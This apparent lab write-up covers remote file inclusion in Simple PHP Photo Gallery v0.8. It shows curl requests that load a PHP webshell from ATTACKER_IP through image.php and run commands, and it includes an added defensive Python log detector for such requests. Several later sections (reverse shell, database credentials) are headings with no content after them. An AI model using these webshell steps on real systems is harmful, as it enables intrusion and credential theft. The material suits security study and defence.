Simple PHP Photo Gallery

Simple PHP Photo Gallery v0.8 on Apache/PHP can allow remote file inclusion (RFI) through image.php, leading to command execution as the web server user.

Discovery

Useful indicators:

80/tcp open  http  Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery

WhatWeb may show:

Apache[2.4.6], PHP[5.4.16], Title[Simple PHP Photo Gallery], X-Powered-By[PHP/5.4.16]

The application version can appear on the main page:

Simple PHP Photo Gallery v0.8

RFI to Webshell

Host a PHP webshell:

cp /usr/share/webshells/php/simple-backdoor.php .
sudo python3 -m http.server 80

Trigger the RFI through the img parameter; in other versions the vulnerable parameter is i:

curl "http://TARGET/image.php?img=http://ATTACKER_IP/simple-backdoor.php&cmd=id"
curl "http://TARGET/image.php?i=http://ATTACKER_IP/simple-backdoor.php&cmd=id"

Successful command execution:
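From the defender's side, the request shape above (a URL in image.php's img or i parameter, usually followed by an extra cmd parameter) is easy to pick out of the Apache access log. The following Python is an added example, not part of the original write-up; the log lines are constructed and 203.0.113.7 stands in for the attacker host.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# image.php reads img in v0.8 and i in other versions (from the write-up).
INCLUDE_PARAMS = ("img", "i")
# Schemes and PHP stream wrappers that mean the include target is not a
# local image path; any of these in the parameter is a red flag.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "expect://")

# Apache combined-log prefix: client ident user [timestamp] "METHOD path PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')


def find_rfi_attempts(log_lines):
    """Return one record per image.php request whose img/i value is a URL."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("path"))
        if not url.path.endswith("/image.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for name in INCLUDE_PARAMS:
            for value in params.get(name, []):
                # parse_qs decoded once; decode again to catch double-encoding
                decoded = unquote(value).lower()
                if decoded.startswith(REMOTE_SCHEMES) or "://" in decoded:
                    hits.append({
                        "ip": m.group("ip"), "time": m.group("ts"),
                        "param": name, "value": decoded,
                        "status": int(m.group("status")),
                        # other parameters (e.g. cmd) suggest a loaded webshell
                        "extra": sorted(k for k in params if k not in INCLUDE_PARAMS),
                    })
    return hits


# Constructed sample log; 203.0.113.7 stands in for the attacker host.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /image.php?img=photos/cat.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /image.php?img=http://203.0.113.7/simple-backdoor.php&cmd=id HTTP/1.1" 200 231 "-" "curl/7.88.1"',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /image.php?i=http%3A%2F%2F203.0.113.7%2Fsimple-backdoor.php&cmd=id HTTP/1.1" 200 231 "-" "curl/7.88.1"',
    '10.0.0.12 - - [12/Mar/2024:10:02:00 +0000] "GET /index.php?page=http://203.0.113.7/x HTTP/1.1" 404 196 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['param']}={hit['value']} extra={hit['extra']}")
```

A 200 status on a flagged request means the remote include succeeded, so the host should be treated as compromised; the fix on the application side is to stop passing the parameter to include and to set allow_url_include=Off.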

Reverse Shell

Create a shell script:

Fetch and execute it through the RFI webshell:

Because the shell script sleeps before connecting back, stop the HTTP server after triggering it and start the listener on the same port:

Database Credentials

Read the gallery database config:

Useful values:

If remote MySQL denies the attacker host, use the credentials locally from the web shell:

Dump the gallery users:

Observed passwords were base64-encoded twice:
